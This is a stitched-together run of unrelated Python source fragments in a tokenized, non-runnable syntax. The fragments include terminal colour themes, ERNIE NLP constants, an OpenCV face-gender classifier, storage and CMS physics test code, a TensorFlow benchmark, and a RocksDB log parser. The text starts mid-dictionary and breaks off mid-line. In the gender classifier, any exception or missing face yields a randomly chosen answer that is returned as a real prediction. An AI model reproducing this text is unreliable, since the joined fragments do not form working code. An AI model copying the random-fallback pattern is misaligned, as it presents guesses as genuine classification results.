'brightYellow':'#fff569' 'brightBlue':'#015aff' 'brightMagenta':'#bf00bf' 'brightCyan':'#00a5a5' 'brightWhite':'#ffffff'} 'scintilla':{'black':'#ffffff' 'red':'#800000' 'green':'#007f00' 'yellow':'#ffff99' 'blue':'#00007f' 'magenta':'#7f007f' 'cyan':'#007f7f' 'white':'#efefef' 'brightBlack':'#adadad' 'brightRed':'#c10000' 'brightGreen':'#00ab00' 'brightYellow':'#fff569' 'brightBlue':'#0000ff' 'brightMagenta':'#be00be' 'brightCyan':'#00a5a5' 'brightWhite':'#ffffff'} 'spyder':{'black':'#ffffff' 'red':'#800000' 'green':'#00aa00' 'yellow':'#ffff99' 'blue':'#0000ff' 'magenta':'#900090' 'cyan':'#27b5ac' 'white':'#efefef' 'brightBlack':'#adadad' 'brightRed':'#c10000' 'brightGreen':'#00c800' 'brightYellow':'#fff569' 'brightBlue':'#0a37ff' 'brightMagenta':'#d500d5' 'brightCyan':'#2dd0c5' 'brightWhite':'#ffffff'} 'spyder/dark':{'black':'#19232D' 'red':'#c80000' 'green':'#11a642' 'yellow':'#c5bb29' 'blue':'#558eff' 'magenta':'#aa00aa' 'cyan':'#20b3a7' 'white':'#ffffff' 'brightBlack':'#4b4b4b' 'brightRed':'#ef0000' 'brightGreen':'#13c24b' 'brightYellow':'#e6e13f' 'brightBlue':'#4395ff' 'brightMagenta':'#da00da' 'brightCyan':'#23cbbd' 'brightWhite':'#ffffff'} 'zenburn':{'black':'#3F3F3F' 'red':'#705050' 'green':'#60B48A' 'yellow':'#DFAF8F' 'blue':'#506070' 'magenta':'#DC8CC3' 'cyan':'#8CD0D3' 'white':'#DCDCCC' 'brightBlack':'#709080' 'brightRed':'#DCA3A3' 'brightGreen':'#C3BF9F' 'brightYellow':'#F0DFAF' 'brightBlue':'#94BFF3' 'brightMagenta':'#EC93D3' 'brightCyan':'#93E0E3' 'brightWhite':'#DCDCCC'} 'solarized/light':{'black':'#fdf6e3' 'red':'#dc322f' 'green':'#859900' 'yellow':'#b58900' 'blue':'#268bd2' 'magenta':'#6c71c4' 'cyan':'#2aa198' 'white':'#93a1a1' 'brightBlack':'#657b83' 'brightRed':'#dc322f' 'brightGreen':'#859900' 'brightYellow':'#b58900' 'brightBlue':'#268bd2' 'brightMagenta':'#6c71c4' 'brightCyan':'#2aa198' 'brightWhite':'#fdf6e3'} 'solarized/dark':{'black':'#002b36' 'red':'#dc322f' 'green':'#859900' 'yellow':'#b58900' 'blue':'#268bd2' 'magenta':'#6c71c4' 'cyan':'#2aa198' 'white':'#93a1a1' 'brightBlack':'#657b83' 'brightRed':'#dc322f' 'brightGreen':'#859900' 'brightYellow':'#b58900' 'brightBlue':'#268bd2' 'brightMagenta':'#6c71c4' 'brightCyan':'#2aa198' 'brightWhite':'#fdf6e3'} 'inkpot':{'black':'#1f1f27' 'red':'#CD5200' 'green':'#9DCD00' 'yellow':'#cd8b00' 'blue':'#87cefa' 'magenta':'#8b8bff' 'cyan':'#87FAE5' 'white':'#93a1a1' 'brightBlack':'#313131' 'brightRed':'#CD2300' 'brightGreen':'#C0CD00' 'brightYellow':'#ffcd8b' 'brightBlue':'#B9E1FA' 'brightMagenta':'#A3A3FF' 'brightCyan':'#B8FAEE' 'brightWhite':'#cfbfad'} 'minimal':{'black':'#ffffff' 'red':'#D22D72' 'green':'#568C3B' 'yellow':'#8A8A0F' 'blue':'#257FAD' 'magenta':'#5D5DB1' 'cyan':'#2D8F6F' 'white':'#7EA2B4' 'brightBlack':'#5A7B8C' 'brightRed':'#D22D72' 'brightGreen':'#568C3B' 'brightYellow':'#8A8A0F' 'brightBlue':'#257FAD' 'brightMagenta':'#5D5DB1' 'brightCyan':'#2D8F6F' 'brightWhite':'#EBF8FF'} 'nightlion':{'black':'#4c4c4c' 'red':'#bb0000' 'green':'#5fde8f' 'yellow':'#f3f167' 'blue':'#276bd8' 'magenta':'#bb00bb' 'cyan':'#00dadf' 'white':'#bbbbbb' 'brightBlack':'#555555' 'brightRed':'#ff5555' 'brightGreen':'#55ff55' 'brightYellow':'#ffff55' 'brightBlue':'#5555ff' 'brightMagenta':'#ff55ff' 'brightCyan':'#55ffff' 'brightWhite':'#ffffff'} 'notepad++':{'black':'#ffffff' 'red':'#CC342B' 'green':'#198844' 'yellow':'#FBA922' 'blue':'#3971ED' 'magenta':'#A36AC7' 'cyan':'#3971ED' 'white':'#C5C8C6' 'brightBlack':'#969896' 'brightRed':'#CC342B' 'brightGreen':'#198844' 'brightYellow':'#FBA922' 'brightBlue':'#3971ED' 'brightMagenta':'#A36AC7' 'brightCyan':'#3971ED' 'brightWhite':'#FFFFFF'} 'oblivion':{'black':'#1D1F21' 'red':'#CC6666' 'green':'#B5BD68' 'yellow':'#F0C674' 'blue':'#81A2BE' 'magenta':'#B294BB' 'cyan':'#8ABEB7' 'white':'#C5C8C6' 'brightBlack':'#969896' 'brightRed':'#CC6666' 'brightGreen':'#B5BD68' 'brightYellow':'#F0C674' 'brightBlue':'#81A2BE' 'brightMagenta':'#B294BB' 'brightCyan':'#8ABEB7' 'brightWhite':'#FFFFFF'} 'obsidian':{'black':'#232C31' 'red':'#2A5491' 'green':'#237986' 'yellow':'#A03B1E' 'blue':'#484D79' 'magenta':'#C59820' 'cyan':'#B02F30' 'white':'#9EA7A6' 'brightBlack':'#3F4944' 'brightRed':'#2A5491' 'brightGreen':'#237986' 'brightYellow':'#A03B1E' 'brightBlue':'#484D79' 'brightMagenta':'#C59820' 'brightCyan':'#B02F30' 'brightWhite':'#B5D8F6'} 'pastel':{'black':'#000000' 'red':'#c37372' 'green':'#72c373' 'yellow':'#c2c372' 'blue':'#7372c3' 'magenta':'#c372c2' 'cyan':'#72c2c3' 'white':'#d9d9d9' 'brightBlack':'#323232' 'brightRed':'#dbaaaa' 'brightGreen':'#aadbaa' 'brightYellow':'#dadbaa' 'brightBlue':'#aaaadb' 'brightMagenta':'#dbaada' 'brightCyan':'#aadadb' 'brightWhite':'#ffffff'} 'retta':{'black':'#000000' 'red':'#A54242' 'green':'#8C9440' 'yellow':'#de935f' 'blue':'#5F819D' 'magenta':'#85678F' 'cyan':'#5E8D87' 'white':'#969896' 'brightBlack':'#373b41' 'brightRed':'#cc6666' 'brightGreen':'#b5bd68' 'brightYellow':'#f0c674' 'brightBlue':'#81a2be' 'brightMagenta':'#b294bb' 'brightCyan':'#8abeb7' 'brightWhite':'#c5c8c6'} 'roboticket':{'black':'#f5f5f5' 'red':'#E64569' 'green':'#89D287' 'yellow':'#DAB752' 'blue':'#439ECF' 'magenta':'#D961DC' 'cyan':'#64AAAF' 'white':'#B3B3B3' 'brightBlack':'#535353' 'brightRed':'#E4859A' 'brightGreen':'#A2CCA1' 'brightYellow':'#E1E387' 'brightBlue':'#6FBBE2' 'brightMagenta':'#E586E7' 'brightCyan':'#96DCDA' 'brightWhite':'#DEDEDE'} 'sublime-monokai/extended':{'black':'#222222' 'red':'#dc2566' 'green':'#8fc029' 'yellow':'#d4c96e' 'blue':'#55bcce' 'magenta':'#9358fe' 'cyan':'#56b7a5' 'white':'#f8f8f2' 'brightBlack':'#76715e' 'brightRed':'#fa2772' 'brightGreen':'#a7e22e' 'brightYellow':'#e7db75' 'brightBlue':'#66d9ee' 'brightMagenta':'#ae82ff' 'brightCyan':'#66efd5' 'brightWhite':'#f9f8f5'} 'vibrant-ink':{'black':'#191919' 'red':'#d00e18' 'green':'#138034' 'yellow':'#ffcb3e' 'blue':'#006bb3' 'magenta':'#6b2775' 'cyan':'#384564' 'white':'#ededed' 'brightBlack':'#5d504a' 'brightRed':'#f07e18' 'brightGreen':'#b1d130' 'brightYellow':'#fff120' 'brightBlue':'#4fc2fd' 'brightMagenta':'#de0071' 'brightCyan':'#5d504a' 'brightWhite':'#ffffff'}}<line_sep>
# -*- coding: utf-8 -* """ some rule """<class_stmt>MaxTruncation(object)<block_start>"""MaxTruncation:超长截断规则 """<line_sep>KEEP_HEAD=0# 从头开始到最大长度截断 KEEP_TAIL=1# 从头开始到max_len-1的位置截断,末尾补上最后一个id(词或字) KEEP_BOTH_HEAD_TAIL=2<block_end># 保留头和尾两个位置,然后按keep_head方式截断 <class_stmt>EmbeddingType(object)<block_start>"""EmbeddingType:文本数据需要转换的embedding类型:no_emb , ernie_emb """<line_sep>NONE_EMBEDDING=0# 不需要emb ERNIE_EMBEDDING=1# 用ernie生成emb FLUID_EMBEDDING=2<block_end># 使用fluid的op生成emb <class_stmt>FluidDataType(object)<block_start>""" FluidDataType data struct wrapper """<def_stmt>__init__ self shape dtype lod_level name=<none><block_start>self.shape=shape<line_sep>self.dtype=dtype<line_sep>self.lod_level=lod_level<line_sep>self.name=name<block_end><block_end><class_stmt>WordPieceType(object)<block_start>"""字词混合切分模式下,每个token的type"""<line_sep>SINGLE_TOKEN=0# 单个字 WORD_START=1# 词首字符 WORD_INCLUDE=2<block_end># 词中间字符 <class_stmt>DataShape(object)<block_start>"""DataShape:输入的数据类型 """<line_sep>STRING="string"# string INT="int"# int64 FLOAT="float"<block_end># float32 <class_stmt>InstanceName(object)<block_start>"""InstanceName:一些常用的命名 """<line_sep>RECORD_ID="id"<line_sep>RECORD_EMB="emb"<line_sep>SRC_IDS="src_ids"<line_sep>WORDSEG_IDS="wordseg_ids"<line_sep>MASK_IDS="mask_ids"<line_sep>LOSS_MASK="loss_mask"<line_sep>SEQ_LENS="seq_lens"<line_sep>SENTENCE_IDS="sent_ids"<line_sep>POS_IDS="pos_ids"<line_sep>TASK_IDS="task_ids"<line_sep>PHONETIC_A_IDS="phonetic_a_ids"<line_sep>PHONETIC_B_IDS="phonetic_b_ids"<line_sep>GLYPH_A_IDS="glyph_a_ids"<line_sep>GLYPH_B_IDS="glyph_b_ids"<line_sep>GLYPH_C_IDS="glyph_c_ids"<line_sep>GLYPH_D_IDS="glyph_d_ids"<line_sep>REL_POS_IDS="rel_pos_ids"<line_sep>DEEP_IDS="deep_ids"<line_sep>BEG_IDS="beg_ids"<line_sep>END_IDS="end_ids"<line_sep>#生成训练相关key TGT_LABEL="tgt_label"<line_sep>TGT_POS="tgt_pos"<line_sep>#生成解码相关key TGT_SRC_IDS="tgt_src_ids"<line_sep>TGT_POS_IDS="tgt_pos_ids"<line_sep>INIT_SCORES="init_scores"<line_sep>PARENT_IDX="parent_idx"<line_sep>TGT_MASK_IDS='tgt_mask_ids'<line_sep>DATA_IDS='data_ids'<line_sep>#多轮对话相关key ROLE_IDS="role_ids"<line_sep>TURN_IDS="turn_ids"<line_sep>TGT_PHONETIC_A_IDS="tgt_phonetic_a_ids"<line_sep>TGT_PHONETIC_B_IDS="tgt_phonetic_b_ids"<line_sep>TGT_GLYPH_A_IDS="tgt_glyph_a_ids"<line_sep>TGT_GLYPH_B_IDS="tgt_glyph_b_ids"<line_sep>TGT_GLYPH_C_IDS="tgt_glyph_c_ids"<line_sep>TGT_GLYPH_D_IDS="tgt_glyph_d_ids"<line_sep># seq2seq的label域相关key TRAIN_LABEL_SRC_IDS="train_label_src_ids"<line_sep>TRAIN_LABEL_MASK_IDS="train_label_mask_ids"<line_sep>TRAIN_LABEL_SEQ_LENS="train_label_seq_lens"<line_sep>INFER_LABEL_SRC_IDS="infer_label_src_ids"<line_sep>INFER_LABEL_MASK_IDS="infer_label_mask_ids"<line_sep>INFER_LABEL_SEQ_LENS="infer_label_seq_lens"<line_sep># term rank 相关的key TERM_POS="term_pos"<line_sep>TERM_TOKENS_NUMS="term_tokens_nums"<line_sep>TERM_INDEX="term_index"<line_sep>TERM_PAIRS="term_pairs"<line_sep>TERM_DIFFS="term_diffs"<line_sep>SEQUENCE_EMB="sequence_output"# 词级别的embedding POOLED_EMB="pooled_output"# 句子级别的embedding TARGET_FEED="target_feed"# 保存模型时需要的入参:表示模型预测时需要输入的变量,tensor 或者variable类型 TARGET_FEED_NAMES="target_feed_name"# 保存模型时需要的入参:表示模型预测时需要输入的变量名称和顺序 TARGET_PREDICTS="target_predicts"# 保存模型时需要的入参:表示预测时最终输出的结果 PREDICT_RESULT="predict_result"# 训练过程中需要传递的预测结果 STUDENT_PREDICT_RESULT="student_predict_result"# 训练过程中需要传递的预测结果 TEACHER_PREDICT_RESULT="teacher_predict_result"# 训练过程中需要传递的预测结果 LABEL="label"# label TEACHER_CE_LOSS="teacher_ce_loss"<line_sep>STUDENT_CE_LOSS="student_ce_loss"<line_sep>DISTILL_LOSS="distill_loss"<line_sep>PRED_LOSS="pred_loss"<line_sep>LOSS="loss"# loss # CRF_EMISSION = "crf_emission" # crf_emission TRAINING="training"# 训练过程 EVALUATE="evaluate"# 评估过程 TEST="test"# 测试过程 SAVE_INFERENCE="save_inference"# 保存inference model的过程 INFERENCE="inference"# 预测过程 STEP="steps"<line_sep>SPEED="speed"<line_sep>TIME_COST="time_cost"<line_sep>GPU_ID="gpu_id"<line_sep>FILE_CHECKPOINTS="checkpoints"<line_sep>FILE_INFERENCE_MODEL="inference_model"<line_sep>TYPE_PY_READER="py_reader"<line_sep>TYPE_DATA_LOADER="data_loader"<line_sep># ERNIE-VIL相关key IMAGE_PIXEL_IDS="image_pixel_ids"<line_sep>IMAGE_POSITION="image_position"<line_sep>IMAGE_TAG_IDS="image_tag_ids"<line_sep>TEXT_INDEX="text_index"<line_sep>IMAGE_INDEX="image_index"<line_sep>POS_INDEX="pos_index"<line_sep># ERNIE-Layout相关key POS_2D_IDS="pos_2d_ids"<line_sep>SEGMENT_IDS="segment_ids"<line_sep># DynaBERT相关key HIDDEN_LAYERS="hidden_layers"<line_sep>LOGIT="logit"<line_sep># prompt相关key LABEL_MAP_IDS="label_map_ids"<line_sep>LABEL_TEXT_IDS="label_text_ids"<line_sep>BATCH_SIZE="batch_size"<line_sep>MAX_SEQ_LEN="max_seq_len"<block_end><class_stmt>FieldLength(object)<block_start>"""一个field在序列化成field_id_list的时候,占的长度是多少 """<line_sep>CUSTOM_TEXT_FIELD=3<line_sep>ERNIE_TEXT_FIELD=6<line_sep>SINGLE_SCALAR_FIELD=1<line_sep>ARRAY_SCALAR_FIELD=2<line_sep>BASIC_TEXT_FIELD=2<line_sep>GENERATE_LABEL_FIELD=6<line_sep>ERNIE_TERM_RANK_TEXT_FIELD=9<line_sep>ERNIT_TERM_RANK_LABEL_FIELD=4<line_sep># ERNIE-VIL RELATED VARIABLES ERNIEVIL_IMAGE_PIXEL_FIELD=1<line_sep>ERNIEVIL_IMAGE_TAGS_FIELD=1<line_sep># ERNIE-Layout RELATED VARIABLES ERNIE_LAYOUT_SEQLABEL_FIELD=10<block_end><class_stmt>FleetMode(object)<block_start>"""Fleet模式 """<line_sep>NO_FLEET="NO_FLEET"<line_sep>CPU_MODE="CPU"<line_sep>GPU_MODE="GPU"<block_end><class_stmt>UploadModelType(object)<block_start>"""模型上传的类型"""<line_sep>UPLOAD_HDFS_IMMEDIATE="immediate"# 实时上传到HDFS UPLOAD_HDFS_LAST_TIME="last_time"<block_end># 训练结束之后由paddlecloud平台进行集中上传 <class_stmt>StoreModelType(object)<block_start>"""模型保存方式的类型"""<line_sep>STORE_HDFS="hadoop"# 保存到hadoop集群上 STORE_IREPO="irepo"<block_end># 保存到irepo模型仓库中 <class_stmt>EncryptType(object)<block_start>"""模型加密的方式"""<line_sep>ENCRYPT_NONE=<none># 不加密 ENCRYPT_MEMORY="memory"# 内存加密 ENCRYPT_FILE="file"<block_end># 文件加密 <class_stmt>InferenceRetcode(object)<block_start>""" 预测服务返回码 """<line_sep>RET_OK=200<line_sep>LOAD_JSON_FAILED=201<line_sep>MISSING_FIELD=202<block_end><class_stmt>GraphMode(object)<block_start>"""图模式 """<line_sep>#动态图 DYGRAPH="dynamic"<line_sep>#静态图 STATIC="static"<block_end>
<import_stmt>random<import_stmt>cv2<line_sep>padding=20<line_sep>MODEL_MEAN_VALUES=(78.4263377603 87.7689143744 114.895847746)<line_sep>genderList=['Male' 'Female']<class_stmt>GenderDetection()<block_start><def_stmt>__init__ self<block_start>faceProto='data/opencv_face_detector.pbtxt'<line_sep>faceModel='data/opencv_face_detector_uint8.pb'<line_sep>genderProto='data/gender_deploy.prototxt'<line_sep>genderModel='data/gender_net.caffemodel'<line_sep>self.ans=[<true> <false>]<line_sep>self.faceNet=cv2.dnn.readNet(faceModel faceProto)<line_sep>self.genderNet=cv2.dnn.readNet(genderModel genderProto)<block_end><def_stmt>highlightFace self net frame conf_threshold=0.9<block_start>frameOpencvDnn=frame.copy()<line_sep>frameHeight=frameOpencvDnn.shape[0]<line_sep>frameWidth=frameOpencvDnn.shape[1]<line_sep>blob=cv2.dnn.blobFromImage(frameOpencvDnn 1.0 (300 300) [104 117 123] <true> <false>)<line_sep>net.setInput(blob)<line_sep>detections=net.forward()<line_sep>faceBoxes=[]<for_stmt>i range(detections.shape[2])<block_start>confidence=detections[0 0 i 2]<if_stmt>confidence<g>conf_threshold<block_start>x1=int(detections[0 0 i 3]<times>frameWidth)<line_sep>y1=int(detections[0 0 i 4]<times>frameHeight)<line_sep>x2=int(detections[0 0 i 5]<times>frameWidth)<line_sep>y2=int(detections[0 0 i 6]<times>frameHeight)<line_sep>faceBoxes.append([x1 y1 x2 y2])<line_sep>cv2.rectangle(frameOpencvDnn (x1 y1) (x2 y2) (0 255 0) int(round(frameHeight/150)) 8)<block_end><block_end><return>frameOpencvDnn faceBoxes<block_end># opencv <def_stmt>detect self img<block_start><try_stmt><block_start>resultImg,faceBoxes=self.highlightFace(self.faceNet img)<if_stmt><not>faceBoxes<block_start><return>self.ans[random.randint(0 1)]<block_end><for_stmt>faceBox faceBoxes<block_start><if_stmt>(max(faceBox)<g>1024)<block_start><continue><block_end>face=img[max(0 faceBox[1]-padding):min(faceBox[3]+padding img.shape[0]-1) max(0 faceBox[0]-padding):min(faceBox[2]+padding img.shape[1]-1)]<line_sep>blob=cv2.dnn.blobFromImage(face 1.0 (227 227) MODEL_MEAN_VALUES swapRB=<false>)<line_sep>self.genderNet.setInput(blob)<line_sep>genderPreds=self.genderNet.forward()<line_sep>gender=genderList[genderPreds[0].argmax()]<if_stmt>(gender<eq>'Female')<block_start><return><true><block_end><else_stmt><block_start><return><false><block_end><block_end><block_end><except_stmt># isort:skip # noqa <block_start><return>self.ans[random.randint(0 1)]<block_end><block_end><block_end>
# Copyright (c) Microsoft Corporation. # Licensed under the MIT License. <import_from_stmt>fclib.models.dilated_cnn create_dcnn_model<def_stmt>test_create_dcnn_model <block_start>mod0=create_dcnn_model(seq_len=1)# default args <assert_stmt>mod0<is><not><none><line_sep>mod1=create_dcnn_model(seq_len=1 n_dyn_fea=1 n_outputs=2 n_dilated_layers=1 kernel_size=2 dropout_rate=0.05 max_cat_id=[30 120])<assert_stmt>mod1<is><not><none><line_sep>mod2=create_dcnn_model(seq_len=1 n_dyn_fea=1 n_outputs=2 n_dilated_layers=2 kernel_size=2 dropout_rate=0.05 max_cat_id=[30 120])<assert_stmt>mod2<is><not><none><block_end>
<import_stmt>FWCore.ParameterSet.Config<as>cms<line_sep># AlCaReco for track based alignment using MinBias events OutALCARECOTkAlMinBias_noDrop=cms.PSet(SelectEvents=cms.untracked.PSet(SelectEvents=cms.vstring('pathALCARECOTkAlMinBias')) outputCommands=cms.untracked.vstring('keep *_ALCARECOTkAlMinBias_*_*' 'keep L1AcceptBunchCrossings_*_*_*' 'keep L1GlobalTriggerReadoutRecord_gtDigis_*_*' 'keep *_TriggerResults_*_*' 'keep DcsStatuss_scalersRawToDigi_*_*' 'keep *_offlinePrimaryVertices_*_*' 'keep *_offlineBeamSpot_*_*'))<import_stmt>copy<line_sep>OutALCARECOTkAlMinBias=copy.deepcopy(OutALCARECOTkAlMinBias_noDrop)<line_sep>OutALCARECOTkAlMinBias.outputCommands.insert(0 "drop *")<line_sep>
"""TFTBechmark scripts"""<import_stmt>shutil<import_stmt>tempfile<import_stmt>time<import_stmt>tensorflow<as>tf<import_stmt>tqdm<import_from_stmt>datasets load_dataset<import_from_stmt>transformers RobertaTokenizerFast<import_from_stmt>tf_transformers.models Classification_Model<import_from_stmt>tf_transformers.models RobertaModel<as>Model<line_sep>_ALLOWED_DECODER_TYPES=["keras_model" "saved_model"]<class_stmt>TftBenchmark<block_start><def_stmt>__init__ self cfg<block_start>self.cfg=cfg<line_sep># Check compatible model type self.model_type=cfg.benchmark.model.type<if_stmt>self.model_type<not><in>_ALLOWED_DECODER_TYPES<block_start><raise>ValueError("Unknow model type {} defined".format(self.model_type))<block_end>self.model_name=cfg.benchmark.model.name<line_sep>self.tokenizer=RobertaTokenizerFast.from_pretrained(self.model_name)<line_sep>self.temp_dir=tempfile.mkdtemp()<block_end><def_stmt>load_and_batch_dataset self<block_start>"""Load TF dataset"""<line_sep>cfg=self.cfg<line_sep>tokenizer=self.tokenizer<line_sep># Load from hydra config dataset_name=cfg.benchmark.data.name<line_sep>take_sample=cfg.benchmark.data.take_sample<line_sep>batch_size=cfg.benchmark.data.batch_size<line_sep>max_length=cfg.benchmark.data.max_length<line_sep>dataset=load_dataset(dataset_name split="test")<if_stmt>take_sample<block_start>dataset=dataset.select(range(50))<block_end># Add summarize: with text self.dataset=dataset<line_sep>dataset=dataset.map(<lambda>e:tokenizer(e["text"] truncation=<true> padding=<true> max_length=max_length) batched=<true> )<line_sep>dataset.set_format(type="tensorflow" columns=["input_ids"])<line_sep>features={x:tf.cast(dataset[x] dtype=tf.int32).to_tensor(default_value=0 shape=[<none> max_length])<for>x ["input_ids"]}<line_sep>features['input_mask']=tf.ones_like(features['input_ids'])<line_sep>features['input_type_ids']=tf.zeros_like(features['input_ids'])<line_sep>tfdataset=tf.data.Dataset.from_tensor_slices((features)).batch(batch_size)<line_sep># Convert alldataset to a list for not including that latency while measuring model # performance # (batch_dataset, batch_size, seq_length) batched_datasets=[(batch_dataset batch_dataset['input_ids'].shape[0])<for>batch_dataset tfdataset]<line_sep><return>batched_datasets<block_end><def_stmt>_load_keras_model self<block_start>"""Load using TextDecoder KerasModel"""<def_stmt>classifier_fn model<block_start><def_stmt>_classifier_fn inputs<block_start><return>model(inputs)<block_end><return>_classifier_fn<block_end>model_name=self.cfg.benchmark.model.name<line_sep># Load Auto Regressive Version model=Model.from_pretrained(model_name=model_name)<line_sep>model=Classification_Model(model num_classes=2)<line_sep>model=model.get_model()<line_sep><return>classifier_fn(model)<block_end><def_stmt>_load_saved_model self<block_start>"""Load using TextDecoder saved_model"""<def_stmt>classifier_fn <block_start>model=self.loaded.signatures['serving_default']<def_stmt>_classifier_fn inputs<block_start><return>model(**inputs)<block_end><return>_classifier_fn<block_end>model_name=self.cfg.benchmark.model.name<line_sep>model=Model.from_pretrained(model_name=model_name)<line_sep>model=Classification_Model(model num_classes=2)<line_sep>model=model.get_model()<line_sep># Save as saved_model model.save_serialized(self.temp_dir overwrite=<true>)<line_sep># Load as saved_model <del_stmt>model<line_sep>self.loaded=tf.saved_model.load(self.temp_dir)<line_sep><return>classifier_fn()<block_end><def_stmt>load_model_classifier_fn self<block_start>"""Load Model"""<if_stmt>self.model_type<eq>"keras_model"<block_start>classifier_fn=self._load_keras_model()<block_end><if_stmt>self.model_type<eq>"saved_model"<block_start>classifier_fn=self._load_saved_model()<block_end><return>classifier_fn<block_end><def_stmt>run self#### Load Decoder function <block_start>classifier_fn=self.load_model_classifier_fn()<line_sep>print("Decoder function loaded succesfully")<line_sep>#### Load dataset batched_datasets=self.load_and_batch_dataset()<line_sep>print("Dataset loaded succesfully")<import_stmt>gc<line_sep>gc.collect()<line_sep>#### Run classifier function # Sample batch (to avoid first time compilation time) sample_batch_inputs,_=batched_datasets[0]<line_sep>outputs=classifier_fn(sample_batch_inputs)<line_sep>slines=0<line_sep>start_time=time.time()<for_stmt>(batch_inputs batch_size) tqdm.tqdm(batched_datasets unit="batch ")<block_start>outputs=classifier_fn(batch_inputs)# noqa slines<augadd>batch_size<block_end>end_time=time.time()<line_sep>shutil.rmtree(self.temp_dir)<line_sep>time_taken=end_time-start_time<line_sep>samples_per_second=slines/time_taken<line_sep><return>{"model_type":self.model_type "time_taken":time_taken "samples_per_second":samples_per_second}<block_end><block_end>
# # Copyright(c) 2020-2021 Intel Corporation # SPDX-License-Identifier: BSD-3-Clause-Clear # <import_stmt>os<import_stmt>pytest<import_from_stmt>api.cas casadm<import_from_stmt>api.cas.cache_config CacheMode<import_from_stmt>core.test_run TestRun<import_from_stmt>storage_devices.disk DiskTypeSet DiskType DiskTypeLowerThan<import_from_stmt>test_tools.dd Dd<import_from_stmt>test_tools.disk_utils Filesystem<import_from_stmt>test_utils.filesystem.file File<import_from_stmt>test_utils.os_utils drop_caches DropCachesMode sync<import_from_stmt>test_utils.size Size Unit<line_sep>mount_point="/mnt/test"<line_sep>@pytest.mark.require_disk("cache" DiskTypeSet([DiskType.optane DiskType.nand]))@pytest.mark.require_disk("core" DiskTypeLowerThan("cache"))@pytest.mark.parametrizex("cache_mode" CacheMode)@pytest.mark.parametrizex("filesystem" Filesystem)@pytest.mark.parametrizex("reboot_type" ["soft" "hard"])@pytest.mark.require_plugin("power_control")<def_stmt>test_load_after_clean_shutdown reboot_type cache_mode filesystem<block_start>""" title: Planned system shutdown test. description: Test for data consistency after clean system shutdown. pass_criteria: - DUT should reboot successfully. - Checksum of file on core device should be the same before and after reboot. """<with_stmt>TestRun.step("Prepare CAS device.")<block_start>cache_disk=TestRun.disks['cache']<line_sep>cache_disk.create_partitions([Size(1 Unit.GibiByte)])<line_sep>cache_dev=cache_disk.partitions[0]<line_sep>core_dev=TestRun.disks['core']<line_sep>cache=casadm.start_cache(cache_dev cache_mode force=<true>)<line_sep>core=cache.add_core(core_dev)<line_sep>core.create_filesystem(filesystem blocksize=int(Size(1 Unit.Blocks4096)))<line_sep>core.mount(mount_point)<block_end><with_stmt>TestRun.step("Create file on cache and count its checksum.")<block_start>test_file=File(os.path.join(mount_point "test_file"))<line_sep>Dd().input("/dev/zero").output(test_file.full_path).block_size(Size(1 Unit.KibiByte)).count(1024).run()<line_sep>test_file.refresh_item()<line_sep>test_file_md5=test_file.md5sum()<line_sep>sync()<line_sep>drop_caches(DropCachesMode.ALL)<block_end><with_stmt>TestRun.step("Reset platform.")<block_start><if_stmt>reboot_type<eq>"soft"<block_start>TestRun.executor.reboot()<block_end><else_stmt><block_start>power_control=TestRun.plugin_manager.get_plugin('power_control')<line_sep>power_control.power_cycle()<block_end><block_end><with_stmt>TestRun.step("Load cache.")<block_start>casadm.load_cache(cache_dev)<line_sep>core.mount(mount_point)<block_end><with_stmt>TestRun.step("Check file md5sum.")<block_start>test_file.refresh_item()<if_stmt>test_file_md5<ne>test_file.md5sum()<block_start>TestRun.LOGGER.error("Checksums does not match - file is corrupted.")<block_end><else_stmt><block_start>TestRun.LOGGER.info("File checksum is correct.")<block_end><block_end><with_stmt>TestRun.step("Remove test file.")<block_start>test_file.remove()<block_end><block_end>
# # Copyright (c) 2019-2021 <NAME> # Copyright (c) 2021-2021 <NAME> # Copyright (c) 2021-2021 <NAME> # Copyright (c) 2021-2021 <NAME> # Copyright (c) 2020-2021 <NAME> # Copyright (c) 2020-2021 <NAME> # Copyright (c) 2019-2021 <NAME> # Copyright (c) 2019-2021 Stony Brook University # Copyright (c) 2019-2021 The Research Foundation of SUNY # # You can redistribute it and/or modify it under the terms of the Apache License, # Version 2.0 (http://www.apache.org/licenses/LICENSE-2.0). # <import_from_stmt>collections defaultdict<import_stmt>re<import_stmt>sys<import_stmt>os<def_stmt>find_avg_faults time_values<block_start>x=[]<line_sep>y=[]<for_stmt>vals time_values<block_start>t_delta=vals[0]<line_sep>maj_faults=vals[1]<line_sep>avg=maj_faults/t_delta<line_sep>prev=x[-1]<if>len(x)<else>0<line_sep>x.append(prev+t_delta)<line_sep>y.append(avg)<block_end><return>x y<block_end><def_stmt>avg data<block_start>total=0<for_stmt>duration,x data<block_start>total<augadd>x<block_end><return>total/len(data)<block_end><def_stmt>weighted_avg data<block_start>time=0<line_sep>total=0<for_stmt>duration,x data<block_start>time<augadd>duration<line_sep>total<augadd>duration<times>x<block_end><return>total/time<block_end><def_stmt>parse_bench_time_values values_dict fn workloads<block_start>start=re.compile(r'\tCommand being timed: "\S+ --benchmarks=(\w+)')<line_sep>elap=re.compile(r'\tElapsed \(wall clock\) time \(h:mm:ss or m:ss\): (\d+):([\d\.]+)')<line_sep>major=re.compile(r'\tMajor \(requiring I/O\) page faults: (\d+)')<line_sep>minor=re.compile(r'\tMinor \(reclaiming a frame\) page faults: (\d+)')<line_sep>inputs=re.compile(r'\tFile system inputs: (\d+)')<line_sep>outputs=re.compile(r'\tFile system outputs: (\d+)')<line_sep>end=re.compile(r'\tExit status: \d+')<with_stmt>open(fn)<as>f<block_start><for_stmt>line f.readlines()<block_start>match=start.match(line)<if_stmt>match<block_start>curr_workload=match.group(1)<line_sep>load_set=set(workloads)<line_sep>load_set.remove(curr_workload)<line_sep>other_workload=load_set.pop()<line_sep>workload=values_dict[(curr_workload other_workload)]<line_sep>data=[]<block_end>match=elap.match(line)<if_stmt>match<block_start>sec=60<times>int(match.group(1))<line_sep>sec<augadd>float(match.group(2))<line_sep>data.append(sec)<block_end><for_stmt>exp [major minor inputs outputs]<block_start>match=exp.match(line)<if_stmt>match<block_start>data.append(int(match.group(1)))<line_sep><break><block_end><block_end>match=end.match(line)<if_stmt>match<block_start>workload.append(data)<block_end><block_end><block_end><block_end><def_stmt>parse_bench_ops_sec values_dict fn<block_start>start=re.compile(r'(read(seq|reverse)|readrandom(writerandom)?|mixgraph)\s*:.* (\d+) ops/sec;\s+([0-9\.]+) MB/s')<line_sep>rwrandomstart=re.compile(r'readrandomwriterandom\s*:.* (\d+) ops/sec;')<line_sep>total_occ_dict={}<with_stmt>open(fn)<as>f<block_start>data=<none><for_stmt>line 